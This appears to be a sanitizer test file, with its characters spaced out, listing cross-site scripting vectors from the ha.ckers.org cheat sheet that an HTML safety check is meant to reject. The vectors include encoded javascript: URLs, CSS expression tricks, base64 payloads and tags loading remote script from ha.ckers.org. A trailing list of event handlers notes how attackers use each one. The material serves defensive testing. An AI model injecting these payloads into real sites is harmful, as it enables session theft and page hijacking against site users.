/ / / /   A l l   t h e s e   t a g s   s h o u l d   f a i l   t h e   H t m l T a g . I s S a f e   m e t h o d .     
 
 / / / /   T h i s   l i s t   i s   b a s e d   o f   t h e   e x a m p l e s   h e r e :   h t t p : / / h a . c k e r s . o r g / x s s . h t m l 
 
 / / / /   N o t e   t h a t   n o t   e v e r y t h i n g   i s   t e s t e d ,   s e e   b o t t o m   o f   f i l e   f o r   w h a t ' s   o m m i t t e d   a n d   w h y 
 
 
 
 
 
 ' ; a l e r t ( S t r i n g . f r o m C h a r C o d e ( 8 8 , 8 3 , 8 3 ) ) / / \ ' ; a l e r t ( S t r i n g . f r o m C h a r C o d e ( 8 8 , 8 3 , 8 3 ) ) / / " ; a l e r t ( S t r i n g . f r o m C h a r C o d e ( 8 8 , 8 3 , 8 3 ) ) / / \ " ; a l e r t ( S t r i n g . f r o m C h a r C o d e ( 8 8 , 8 3 , 8 3 ) ) / / - - > < / S C R I P T > " > ' > < S C R I P T >                                                                                                                                                                                                                                                                                                                                                                     	 a l e r t ( S t r i n g . f r o m C h a r C o d e ( 8 8 ,   8 3 ,   8 3 ) ) < / S C R I P T > ' ' ; ! - - " < X S S > = & { ( ) } 
 
 
 
 < S C R I P T   S R C = h t t p : / / h a . c k e r s . o r g / x s s . j s > < / S C R I P T > 
 
 
 
 < I M G   S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < I M G   S R C = j a v a s c r i p t : a l e r t ( ' X S S ' ) > 
 
 
 
 < I M G   S R C = J a V a S c R i P t : a l e r t ( ' X S S ' ) > 
 
 
 
 < I M G   S R C = j a v a s c r i p t : a l e r t ( & q u o t ; X S S & q u o t ; ) > 
 
 
 
 < I M G   S R C = ` j a v a s c r i p t : a l e r t ( " R S n a k e   s a y s ,   ' X S S ' " ) ` > 
 
 
 
 < I M G   " " " > < S C R I P T > a l e r t ( " X S S " ) < / S C R I P T > " > 
 
 
 
 < I M G   S R C = j a v a s c r i p t : a l e r t ( S t r i n g . f r o m C h a r C o d e ( 8 8 , 8 3 , 8 3 ) ) > 
 
 
 
 < I M G   S R C = & # 1 0 6 ; & # 9 7 ; & # 1 1 8 ; & # 9 7 ; & # 1 1 5 ; & # 9 9 ; & # 1 1 4 ; & # 1 0 5 ; & # 1 1 2 ; & # 1 1 6 ; & # 5 8 ; & # 9 7 ; & # 1 0 8 ; & # 1 0 1 ; & # 1 1 4 ; & # 1 1 6 ; & # 4 0 ; & # 3 9 ; & # 8 8 ; & # 8 3 ; & # 8 3 ; & # 3 9 ; & # 4 1 ; > 
 
 
 
 < I M G   S R C = & # 0 0 0 0 1 0 6 & # 0 0 0 0 0 9 7 & # 0 0 0 0 1 1 8 & # 0 0 0 0 0 9 7 & # 0 0 0 0 1 1 5 & # 0 0 0 0 0 9 9 & # 0 0 0 0 1 1 4 & # 0 0 0 0 1 0 5 & # 0 0 0 0 1 1 2 & # 0 0 0 0 1 1 6 & # 0 0 0 0 0 5 8 & # 0 0 0 0 0 9 7 & # 0 0 0 0 1 0 8 & # 0 0 0 0 1 0 1 & # 0 0 0 0 1 1 4 & # 0 0 0 0 1 1 6 & # 0 0 0 0 0 4 0 & # 0 0 0 0 0 3 9 & # 0 0 0 0 0 8 8 & # 0 0 0 0 0 8 3 & # 0 0 0 0 0 8 3 & # 0 0 0 0 0 3 9 & # 0 0 0 0 0 4 1 > 
 
 
 
 < I M G   S R C = & # x 6 A & # x 6 1 & # x 7 6 & # x 6 1 & # x 7 3 & # x 6 3 & # x 7 2 & # x 6 9 & # x 7 0 & # x 7 4 & # x 3 A & # x 6 1 & # x 6 C & # x 6 5 & # x 7 2 & # x 7 4 & # x 2 8 & # x 2 7 & # x 5 8 & # x 5 3 & # x 5 3 & # x 2 7 & # x 2 9 > 
 
 
 
 < I M G   S R C = " j a v 	 a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < I M G   S R C = " j a v & # x 0 9 ; a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < I M G   S R C = " j a v & # x 0 A ; a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < I M G   S R C = " j a v & # x 0 D ; a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < I M G 
 
 S R C 
 
 = 
 
 " 
 
 j 
 
 a 
 
 v 
 
 a 
 
 s 
 
 c 
 
 r 
 
 i 
 
 p 
 
 t 
 
 : 
 
 a 
 
 l 
 
 e 
 
 r 
 
 t 
 
 ( 
 
 ' 
 
 X 
 
 S 
 
 S 
 
 ' 
 
 ) 
 
 " 
 
 > 
 
 
 
 < I M G   S R C = "   & # 1 4 ;     j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < S C R I P T / X S S   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < B O D Y   o n l o a d ! # $ % & ( ) * ~ + - _ . , : ; ? @ [ / | \ ] ^ ` = a l e r t ( " X S S " ) > 
 
 
 
 < S C R I P T / S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < < S C R I P T >   	 a l e r t ( " X S S " ) ;   / / < < / S C R I P T > 
 
 
 
 < S C R I P T   S R C = h t t p : / / h a . c k e r s . o r g / x s s . j s ? < B > 
 
 
 
 < S C R I P T   S R C = / / h a . c k e r s . o r g / . j > 
 
 
 
 < I M G   S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " 
 
 
 
 < i f r a m e   s r c = h t t p : / / h a . c k e r s . o r g / s c r i p t l e t . h t m l   < 
 
 
 
 < S C R I P T > a l e r t ( / X S S / . s o u r c e ) < / S C R I P T > 
 
 
 
 \ " ; a l e r t ( ' X S S ' ) ; / / 
 
 
 
 < / T I T L E > < S C R I P T >                 	 a l e r t ( " X S S " ) ; < / S C R I P T > 
 
 
 
 < I N P U T   T Y P E = " I M A G E "   S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < B O D Y   B A C K G R O U N D = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > 
 
 
 
 < B O D Y   O N L O A D = a l e r t ( ' X S S ' ) > 
 
 
 
 < I M G   D Y N S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > 
 
 
 
 < I M G   L O W S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > 
 
 
 
 < B G S O U N D   S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < B R   S I Z E = " & { a l e r t ( ' X S S ' ) } " > 
 
 
 
 < L A Y E R   S R C = " h t t p : / / h a . c k e r s . o r g / s c r i p t l e t . h t m l " > < / L A Y E R > 
 
 
 
 < L I N K   R E L = " s t y l e s h e e t "   H R E F = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < L I N K   R E L = " s t y l e s h e e t "   H R E F = " h t t p : / / h a . c k e r s . o r g / x s s . c s s " > 
 
 
 
 < S T Y L E > @ i m p o r t ' h t t p : / / h a . c k e r s . o r g / x s s . c s s ' ; < / S T Y L E > 
 
 
 
 < M E T A   H T T P - E Q U I V = " L i n k "   C o n t e n t = " < h t t p : / / h a . c k e r s . o r g / x s s . c s s > ;   R E L = s t y l e s h e e t " > 
 
 
 
 < S T Y L E > B O D Y { - m o z - b i n d i n g : u r l ( " h t t p : / / h a . c k e r s . o r g / x s s m o z . x m l # x s s " ) } < / S T Y L E > 
 
 
 
 < X S S   S T Y L E = " b e h a v i o r :   u r l ( x s s . h t c ) ; " > 
 
 
 
 < S T Y L E > l i   { l i s t - s t y l e - i m a g e :   u r l ( " j a v a s c r i p t : a l e r t ( ' X S S ' ) " ) ; } < / S T Y L E > < U L > < L I > X S S 
 
 
 
 < I M G   S R C = ' v b s c r i p t : m s g b o x ( " X S S " ) ' > 
 
 
 
 < I M G   S R C = " m o c h a : [ c o d e ] " > 
 
 
 
 < I M G   S R C = " l i v e s c r i p t : [ c o d e ] " > 
 
 
 
 < M E T A   H T T P - E Q U I V = " r e f r e s h "   C O N T E N T = " 0 ; u r l = j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < M E T A   H T T P - E Q U I V = " r e f r e s h "   C O N T E N T = " 0 ; u r l = d a t a : t e x t / h t m l ; b a s e 6 4 , P H N j c m l w d D 5 h b G V y d C g n W F N T J y k 8 L 3 N j c m l w d D 4 K " > 
 
 
 
 < M E T A   H T T P - E Q U I V = " r e f r e s h "   C O N T E N T = " 0 ;   U R L = h t t p : / / ; U R L = j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > 
 
 
 
 < I F R A M E   S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > < / I F R A M E > 
 
 
 
 < F R A M E S E T > < F R A M E   S R C = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; " > < / F R A M E S E T > 
 
 
 
 < T A B L E   B A C K G R O U N D = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > 
 
 
 
 < T A B L E > < T D   B A C K G R O U N D = " j a v a s c r i p t : a l e r t ( ' X S S ' ) " > 
 
 
 
 < D I V   S T Y L E = " b a c k g r o u n d - i m a g e :   u r l ( j a v a s c r i p t : a l e r t ( ' X S S ' ) ) " > 
 
 
 
 < D I V   S T Y L E = " b a c k g r o u n d - i m a g e : \ 0 0 7 5 \ 0 0 7 2 \ 0 0 6 C \ 0 0 2 8 ' \ 0 0 6 a \ 0 0 6 1 \ 0 0 7 6 \ 0 0 6 1 \ 0 0 7 3 \ 0 0 6 3 \ 0 0 7 2 \ 0 0 6 9 \ 0 0 7 0 \ 0 0 7 4 \ 0 0 3 a \ 0 0 6 1 \ 0 0 6 c \ 0 0 6 5 \ 0 0 7 2 \ 0 0 7 4 \ 0 0 2 8 . 1 0 2 7 \ 0 0 5 8 . 1 0 5 3 \ 0 0 5 3 \ 0 0 2 7 \ 0 0 2 9 ' \ 0 0 2 9 " > 
 
 
 
 < D I V   S T Y L E = " b a c k g r o u n d - i m a g e :   u r l ( & # 1 ; j a v a s c r i p t : a l e r t ( ' X S S ' ) ) " > 
 
 
 
 < D I V   S T Y L E = " w i d t h :   e x p r e s s i o n ( a l e r t ( ' X S S ' ) ) ; " > 
 
 
 
 < S T Y L E > @ i m \ p o r t ' \ j a \ v a s c \ r i p t : a l e r t ( " X S S " ) ' ; < / S T Y L E > 
 
 
 
 < I M G   S T Y L E = " x s s : e x p r / * X S S * / e s s i o n ( a l e r t ( ' X S S ' ) ) " > 
 
 
 
 < X S S   S T Y L E = " x s s : e x p r e s s i o n ( a l e r t ( ' X S S ' ) ) " > 
 
 
 
 e x p / * < A   S T Y L E = ' n o \ x s s : n o x s s ( " * / / * " ) ; 
 
 x s s : & # 1 0 1 ; x & # x 2 F ; * X S S * / / * / * / p r e s s i o n ( a l e r t ( " X S S " ) ) ' > 
 
 
 
 < S T Y L E   T Y P E = " t e x t / j a v a s c r i p t " > a l e r t ( ' X S S ' ) ; < / S T Y L E > 
 
 
 
 / / / /   N O T E :   M a r k d o w n D e e p   p e r m i t s   c l a s s   a t t r i b u t e   o n   a n c h o r   t a g s ,   b u t   p r e v e n t s   < s t y l e >   t a g 
 
 / / / / < S T Y L E > . X S S { b a c k g r o u n d - i m a g e : u r l ( " j a v a s c r i p t : a l e r t ( ' X S S ' ) " ) ; } < / S T Y L E > < A   C L A S S = X S S > < / A > 
 
 
 
 < S T Y L E   t y p e = " t e x t / c s s " > B O D Y { b a c k g r o u n d : u r l ( " j a v a s c r i p t : a l e r t ( ' X S S ' ) " ) } < / S T Y L E > 
 
 
 
 < ! - - [ i f   g t e   I E   4 ] > 
 
 < S C R I P T > a l e r t ( ' X S S ' ) ; < / S C R I P T > 
 
 < ! [ e n d i f ] - - > 
 
 
 
 < B A S E   H R E F = " j a v a s c r i p t : a l e r t ( ' X S S ' ) ; / / " > 
 
 
 
 < O B J E C T   T Y P E = " t e x t / x - s c r i p t l e t "   D A T A = " h t t p : / / h a . c k e r s . o r g / s c r i p t l e t . h t m l " > < / O B J E C T > 
 
 
 
 < O B J E C T   c l a s s i d = c l s i d : a e 2 4 f d a e - 0 3 c 6 - 1 1 d 1 - 8 b 7 6 - 0 0 8 0 c 7 4 4 f 3 8 9 > < p a r a m   n a m e = u r l   v a l u e = j a v a s c r i p t : a l e r t ( ' X S S ' ) > < / O B J E C T > 
 
 
 
 < E M B E D   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . s w f "   A l l o w S c r i p t A c c e s s = " a l w a y s " > < / E M B E D > 
 
 
 
 < E M B E D   S R C = " d a t a : i m a g e / s v g + x m l ; b a s e 6 4 , P H N 2 Z y B 4 b W x u c z p z d m c 9 I m h 0 d H   A 6 L y 9 3 d 3 c u d z M u b 3 J n L z I w M D A v c 3 Z n I i B 4 b W x u c z 0 i a H R 0 c D o v L 3 d 3 d y 5 3 M y 5 v c m c v   M j A w M C 9 z d m c i I H h t b G 5 z O n h s a W 5 r P S J o d H R w O i 8 v d 3 d 3 L n c z L m 9 y Z y 8 x O T k 5 L 3 h s   a W 5 r I i B 2 Z X J z a W 9 u P S I x L j A i I H g 9 I j A i I H k 9 I j A i I H d p Z H R o P S I x O T Q i I G h l a W d o d D 0 i M j A w   I i B p Z D 0 i e H N z I j 4 8 c 2 N y a X B 0 I H R 5 c G U 9 I n R l e H Q v Z W N t Y X N j c m l w d C I + Y W x l c n Q o I l h   T U y I p O z w v c 2 N y a X B 0 P j w v c 3 Z n P g = = "   t y p e = " i m a g e / s v g + x m l "   A l l o w S c r i p t A c c e s s = " a l w a y s " > < / E M B E D > 
 
 
 
 < H T M L   x m l n s : x s s > 
 
     < ? i m p o r t   n a m e s p a c e = " x s s "   i m p l e m e n t a t i o n = " h t t p : / / h a . c k e r s . o r g / x s s . h t c " > 
 
     < x s s : x s s > X S S < / x s s : x s s > 
 
 < / H T M L > 
 
 
 
 < X M L   I D = I > < X > < C > < ! [ C D A T A [ < I M G   S R C = " j a v a s ] ] > < ! [ C D A T A [ c r i p t : a l e r t ( ' X S S ' ) ; " > ] ] > 
 
 < / C > < / X > < / x m l > < S P A N   D A T A S R C = # I   D A T A F L D = C   D A T A F O R M A T A S = H T M L > < / S P A N > 
 
 
 
 < X M L   I D = " x s s " > < I > < B > & l t ; I M G   S R C = " j a v a s < ! - -   - - > c r i p t : a l e r t ( ' X S S ' ) " & g t ; < / B > < / I > < / X M L > 
 
 < S P A N   D A T A S R C = " # x s s "   D A T A F L D = " B "   D A T A F O R M A T A S = " H T M L " > < / S P A N > 
 
 
 
 < X M L   S R C = " x s s t e s t . x m l "   I D = I > < / X M L > 
 
 < S P A N   D A T A S R C = # I   D A T A F L D = C   D A T A F O R M A T A S = H T M L > < / S P A N > 
 
 
 
 < H T M L > < B O D Y > 
 
 < ? x m l : n a m e s p a c e   p r e f i x = " t "   n s = " u r n : s c h e m a s - m i c r o s o f t - c o m : t i m e " > 
 
 < ? i m p o r t   n a m e s p a c e = " t "   i m p l e m e n t a t i o n = " # d e f a u l t # t i m e 2 " > 
 
 < t : s e t   a t t r i b u t e N a m e = " i n n e r H T M L "   t o = " X S S & l t ; S C R I P T   D E F E R & g t ; a l e r t ( & q u o t ; X S S & q u o t ; ) & l t ; / S C R I P T & g t ; " > 
 
 < / B O D Y > < / H T M L > 
 
 
 
 < S C R I P T   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j p g " > < / S C R I P T > 
 
 
 
 < ! - - # e x e c   c m d = " / b i n / e c h o   ' < S C R ' " - - > < ! - - # e x e c   c m d = " / b i n / e c h o   ' I P T   S R C = h t t p : / / h a . c k e r s . o r g / x s s . j s > < / S C R I P T > ' " - - > 
 
 
 
 < ?   e c h o ( ' < S C R ) ' ; 
 
 e c h o ( ' I P T > a l e r t ( " X S S " ) < / S C R I P T > ' ) ;   ? > 
 
 
 
 < M E T A   H T T P - E Q U I V = " S e t - C o o k i e "   C o n t e n t = " U S E R I D = & l t ; S C R I P T & g t ; a l e r t ( ' X S S ' ) & l t ; / S C R I P T & g t ; " > 
 
 
 
 < H E A D > < M E T A   H T T P - E Q U I V = " C O N T E N T - T Y P E "   C O N T E N T = " t e x t / h t m l ;   c h a r s e t = U T F - 7 " >   < / H E A D > + A D w - S C R I P T + A D 4 - a l e r t ( ' X S S ' ) ; + A D w - / S C R I P T + A D 4 - 
 
 
 
 < S C R I P T   a = " > "   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < S C R I P T   = " > "   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < S C R I P T   a = " > "   ' '   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < S C R I P T   " a = ' > ' "   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < S C R I P T   a = ` > `   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < S C R I P T   a = " > ' > "   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < S C R I P T > 	 d o c u m e n t . w r i t e ( " < S C R I " ) ; < / S C R I P T > P T   S R C = " h t t p : / / h a . c k e r s . o r g / x s s . j s " > < / S C R I P T > 
 
 
 
 < A   H R E F = " h 
 
 t t 	 p : / / 6 & # 9 ; 6 . 0 0 0 1 4 6 . 0 x 7 . 1 4 7 / " > X S S < / A > 
 
 
 
 < A   H R E F = " j a v a s c r i p t : d o c u m e n t . l o c a t i o n = ' h t t p : / / w w w . g o o g l e . c o m / ' " > X S S < / A > 
 
 
 
 < A   H R E F = " b l a h "   o n C l i c k = " a l e r t ( ' X S S ' ) " > t e x t < / a > 
 
 
 
 
 
 
 
 = = = = = =   U N T E S T E D   = = = = = = 
 
 
 
 E v e r y t h i n g   f r o m   h e r e   d o w n   w a s   i n   t h e   p o s t   h t t p : / / h a . c k e r s . o r g / x s s . h t m l ,   b u t   n o t   t e s t e d   h e r e . 
 
 
 
 
 
 
 
 / / / /   N u l l s   i n   j a v a s c r i p t   -   N / A 
 
 p e r l   - e   ' p r i n t   " < I M G   S R C = j a v a \ 0 s c r i p t : a l e r t ( \ " X S S \ " ) > " ; '   >   o u t 
 
 p e r l   - e   ' p r i n t   " < S C R \ 0 I P T > a l e r t ( \ " X S S \ " ) < / S C R \ 0 I P T > " ; '   >   o u t 
 
 
 
 / / / /   J a v a s c r i p t   e v e n t   h a n d l e r s   -   n o n e   o f   t h e s e   a r e   i n   o u r   w h i t e   l i s t 
 
 1 . 	 F S C o m m a n d ( )   ( a t t a c k e r   c a n   u s e   t h i s   w h e n   e x e c u t e d   f r o m   w i t h i n   a n   e m b e d d e d   F l a s h   o b j e c t ) 
 
 2 . 	 o n A b o r t ( )   ( w h e n   u s e r   a b o r t s   t h e   l o a d i n g   o f   a n   i m a g e ) 
 
 3 . 	 o n A c t i v a t e ( )   ( w h e n   o b j e c t   i s   s e t   a s   t h e   a c t i v e   e l e m e n t ) 
 
 4 . 	 o n A f t e r P r i n t ( )   ( a c t i v a t e s   a f t e r   u s e r   p r i n t s   o r   p r e v i e w s   p r i n t   j o b ) 
 
 5 . 	 o n A f t e r U p d a t e ( )   ( a c t i v a t e s   o n   d a t a   o b j e c t   a f t e r   u p d a t i n g   d a t a   i n   t h e   s o u r c e   o b j e c t ) 
 
 6 . 	 o n B e f o r e A c t i v a t e ( )   ( f i r e s   b e f o r e   t h e   o b j e c t   i s   s e t   a s   t h e   a c t i v e   e l e m e n t ) 
 
 7 . 	 o n B e f o r e C o p y ( )   ( a t t a c k e r   e x e c u t e s   t h e   a t t a c k   s t r i n g   r i g h t   b e f o r e   a   s e l e c t i o n   i s   c o p i e d   t o   t h e   c l i p b o a r d   -   a t t a c k e r s   c a n   d o   t h i s   w i t h   t h e   e x e c C o m m a n d ( " C o p y " )   f u n c t i o n ) 
 
 8 . 	 o n B e f o r e C u t ( )   ( a t t a c k e r   e x e c u t e s   t h e   a t t a c k   s t r i n g   r i g h t   b e f o r e   a   s e l e c t i o n   i s   c u t ) 
 
 9 . 	 o n B e f o r e D e a c t i v a t e ( )   ( f i r e s   r i g h t   a f t e r   t h e   a c t i v e E l e m e n t   i s   c h a n g e d   f r o m   t h e   c u r r e n t   o b j e c t ) 
 
 1 0 . 	 o n B e f o r e E d i t F o c u s ( )   ( F i r e s   b e f o r e   a n   o b j e c t   c o n t a i n e d   i n   a n   e d i t a b l e   e l e m e n t   e n t e r s   a   U I - a c t i v a t e d   s t a t e   o r   w h e n   a n   e d i t a b l e   c o n t a i n e r   o b j e c t   i s   c o n t r o l   s e l e c t e d ) 
 
 1 1 . 	 o n B e f o r e P a s t e ( )   ( u s e r   n e e d s   t o   b e   t r i c k e d   i n t o   p a s t i n g   o r   b e   f o r c e d   i n t o   i t   u s i n g   t h e   e x e c C o m m a n d ( " P a s t e " )   f u n c t i o n ) 
 
 1 2 . 	 o n B e f o r e P r i n t ( )   ( u s e r   w o u l d   n e e d   t o   b e   t r i c k e d   i n t o   p r i n t i n g   o r   a t t a c k e r   c o u l d   u s e   t h e   p r i n t ( )   o r   e x e c C o m m a n d ( " P r i n t " )   f u n c t i o n ) . 
 
 1 3 . 	 o n B e f o r e U n l o a d ( )   ( u s e r   w o u l d   n e e d   t o   b e   t r i c k e d   i n t o   c l o s i n g   t h e   b r o w s e r   -   a t t a c k e r   c a n n o t   u n l o a d   w i n d o w s   u n l e s s   i t   w a s   s p a w n e d   f r o m   t h e   p a r e n t ) 
 
 1 4 . 	 o n B e g i n ( )   ( t h e   o n b e g i n   e v e n t   f i r e s   i m m e d i a t e l y   w h e n   t h e   e l e m e n t ' s   t i m e l i n e   b e g i n s ) 
 
 1 5 . 	 o n B l u r ( )   ( i n   t h e   c a s e   w h e r e   a n o t h e r   p o p u p   i s   l o a d e d   a n d   w i n d o w   l o o s e s   f o c u s ) 
 
 1 6 . 	 o n B o u n c e ( )   ( f i r e s   w h e n   t h e   b e h a v i o r   p r o p e r t y   o f   t h e   m a r q u e e   o b j e c t   i s   s e t   t o   " a l t e r n a t e "   a n d   t h e   c o n t e n t s   o f   t h e   m a r q u e e   r e a c h   o n e   s i d e   o f   t h e   w i n d o w ) 
 
 1 7 . 	 o n C e l l C h a n g e ( )   ( f i r e s   w h e n   d a t a   c h a n g e s   i n   t h e   d a t a   p r o v i d e r ) 
 
 1 8 . 	 o n C h a n g e ( )   ( s e l e c t ,   t e x t ,   o r   T E X T A R E A   f i e l d   l o s e s   f o c u s   a n d   i t s   v a l u e   h a s   b e e n   m o d i f i e d ) 
 
 1 9 . 	 o n C l i c k ( )   ( s o m e o n e   c l i c k s   o n   a   f o r m ) 
 
 2 0 . 	 o n C o n t e x t M e n u ( )   ( u s e r   w o u l d   n e e d   t o   r i g h t   c l i c k   o n   a t t a c k   a r e a ) 
 
 2 1 . 	 o n C o n t r o l S e l e c t ( )   ( f i r e s   w h e n   t h e   u s e r   i s   a b o u t   t o   m a k e   a   c o n t r o l   s e l e c t i o n   o f   t h e   o b j e c t ) 
 
 2 2 . 	 o n C o p y ( )   ( u s e r   n e e d s   t o   c o p y   s o m e t h i n g   o r   i t   c a n   b e   e x p l o i t e d   u s i n g   t h e   e x e c C o m m a n d ( " C o p y " )   c o m m a n d ) 
 
 2 3 . 	 o n C u t ( )   ( u s e r   n e e d s   t o   c o p y   s o m e t h i n g   o r   i t   c a n   b e   e x p l o i t e d   u s i n g   t h e   e x e c C o m m a n d ( " C u t " )   c o m m a n d ) 
 
 2 4 . 	 o n D a t a A v a i l a b l e ( )   ( u s e r   w o u l d   n e e d   t o   c h a n g e   d a t a   i n   a n   e l e m e n t ,   o r   a t t a c k e r   c o u l d   p e r f o r m   t h e   s a m e   f u n c t i o n ) 
 
 2 5 . 	 o n D a t a S e t C h a n g e d ( )   ( f i r e s   w h e n   t h e   d a t a   s e t   e x p o s e d   b y   a   d a t a   s o u r c e   o b j e c t   c h a n g e s ) 
 
 2 6 . 	 o n D a t a S e t C o m p l e t e ( )   ( f i r e s   t o   i n d i c a t e   t h a t   a l l   d a t a   i s   a v a i l a b l e   f r o m   t h e   d a t a   s o u r c e   o b j e c t ) 
 
 2 7 . 	 o n D b l C l i c k ( )   ( u s e r   d o u b l e - c l i c k s   a   f o r m   e l e m e n t   o r   a   l i n k ) 
 
 2 8 . 	 o n D e a c t i v a t e ( )   ( f i r e s   w h e n   t h e   a c t i v e E l e m e n t   i s   c h a n g e d   f r o m   t h e   c u r r e n t   o b j e c t   t o   a n o t h e r   o b j e c t   i n   t h e   p a r e n t   d o c u m e n t ) 
 
 2 9 . 	 o n D r a g ( )   ( r e q u i r e s   t h a t   t h e   u s e r   d r a g s   a n   o b j e c t ) 
 
 3 0 . 	 o n D r a g E n d ( )   ( r e q u i r e s   t h a t   t h e   u s e r   d r a g s   a n   o b j e c t ) 
 
 3 1 . 	 o n D r a g L e a v e ( )   ( r e q u i r e s   t h a t   t h e   u s e r   d r a g s   a n   o b j e c t   o f f   a   v a l i d   l o c a t i o n ) 
 
 3 2 . 	 o n D r a g E n t e r ( )   ( r e q u i r e s   t h a t   t h e   u s e r   d r a g s   a n   o b j e c t   i n t o   a   v a l i d   l o c a t i o n ) 
 
 3 3 . 	 o n D r a g O v e r ( )   ( r e q u i r e s   t h a t   t h e   u s e r   d r a g s   a n   o b j e c t   i n t o   a   v a l i d   l o c a t i o n ) 
 
 3 4 . 	 o n D r a g D r o p ( )   ( u s e r   d r o p s   a n   o b j e c t   ( e . g .   f i l e )   o n t o   t h e   b r o w s e r   w i n d o w ) 
 
 3 5 . 	 o n D r o p ( )   ( u s e r   d r o p s   a n   o b j e c t   ( e . g .   f i l e )   o n t o   t h e   b r o w s e r   w i n d o w ) 
 
 3 6 . 	 o n E n d ( )   ( t h e   o n E n d   e v e n t   f i r e s   w h e n   t h e   t i m e l i n e   e n d s .     T h i s   c a n   b e   e x p l o i t e d ,   l i k e   m o s t   o f   t h e   H T M L + T I M E   e v e n t   h a n d l e r s   b y   d o i n g   s o m e t h i n g   l i k e   < P   S T Y L E = " b e h a v i o r : u r l ( ' # d e f a u l t # t i m e 2 ' ) "   o n E n d = " a l e r t ( ' X S S ' ) " > ) 
 
 3 7 . 	 o n E r r o r ( )   ( l o a d i n g   o f   a   d o c u m e n t   o r   i m a g e   c a u s e s   a n   e r r o r ) 
 
 3 8 . 	 o n E r r o r U p d a t e ( )   ( f i r e s   o n   a   d a t a b o u n d   o b j e c t   w h e n   a n   e r r o r   o c c u r s   w h i l e   u p d a t i n g   t h e   a s s o c i a t e d   d a t a   i n   t h e   d a t a   s o u r c e   o b j e c t ) 
 
 3 9 . 	 o n F i l t e r C h a n g e ( )   ( f i r e s   w h e n   a   v i s u a l   f i l t e r   c o m p l e t e s   s t a t e   c h a n g e ) 
 
 4 0 . 	 o n F i n i s h ( )   ( a t t a c k e r   c a n   c r e a t e   t h e   e x p l o i t   w h e n   m a r q u e e   i s   f i n i s h e d   l o o p i n g ) 
 
 4 1 . 	 o n F o c u s ( )   ( a t t a c k e r   e x e c u t e s   t h e   a t t a c k   s t r i n g   w h e n   t h e   w i n d o w   g e t s   f o c u s ) 
 
 4 2 . 	 o n F o c u s I n ( )   ( a t t a c k e r   e x e c u t e s   t h e   a t t a c k   s t r i n g   w h e n   w i n d o w   g e t s   f o c u s ) 
 
 4 3 . 	 o n F o c u s O u t ( )   ( a t t a c k e r   e x e c u t e s   t h e   a t t a c k   s t r i n g   w h e n   w i n d o w   l o o s e s   f o c u s ) 
 
 4 4 . 	 o n H e l p ( )   ( a t t a c k e r   e x e c u t e s   t h e   a t t a c k   s t r i n g   w h e n   u s e r s   h i t s   F 1   w h i l e   t h e   w i n d o w   i s   i n   f o c u s ) 
 
 4 5 . 	 o n K e y D o w n ( )   ( u s e r   d e p r e s s e s   a   k e y ) 
 
 4 6 . 	 o n K e y P r e s s ( )   ( u s e r   p r e s s e s   o r   h o l d s   d o w n   a   k e y ) 
 
 4 7 . 	 o n K e y U p ( )   ( u s e r   r e l e a s e s   a   k e y ) 
 
 4 8 . 	 o n L a y o u t C o m p l e t e ( )   ( u s e r   w o u l d   h a v e   t o   p r i n t   o r   p r i n t   p r e v i e w ) 
 
 4 9 . 	 o n L o a d ( )   ( a t t a c k e r   e x e c u t e s   t h e   a t t a c k   s t r i n g   a f t e r   t h e   w i n d o w   l o a d s ) 
 
 5 0 . 	 o n L o s e C a p t u r e ( )   ( c a n   b e   e x p l o i t e d   b y   t h e   r e l e a s e C a p t u r e ( )   m e t h o d ) 
 
 5 1 . 	 o n M e d i a C o m p l e t e ( )   ( W h e n   a   s t r e a m i n g   m e d i a   f i l e   i s   u s e d ,   t h i s   e v e n t   c o u l d   f i r e   b e f o r e   t h e   f i l e   s t a r t s   p l a y i n g ) 
 
 5 2 . 	 o n M e d i a E r r o r ( )   ( U s e r   o p e n s   a   p a g e   i n   t h e   b r o w s e r   t h a t   c o n t a i n s   a   m e d i a   f i l e ,   a n d   t h e   e v e n t   f i r e s   w h e n   t h e r e   i s   a   p r o b l e m ) 
 
 5 3 . 	 o n M o u s e D o w n ( )   ( t h e   a t t a c k e r   w o u l d   n e e d   t o   g e t   t h e   u s e r   t o   c l i c k   o n   a n   i m a g e ) 
 
 5 4 . 	 o n M o u s e E n t e r ( )   ( c u r s o r   m o v e s   o v e r   a n   o b j e c t   o r   a r e a ) 
 
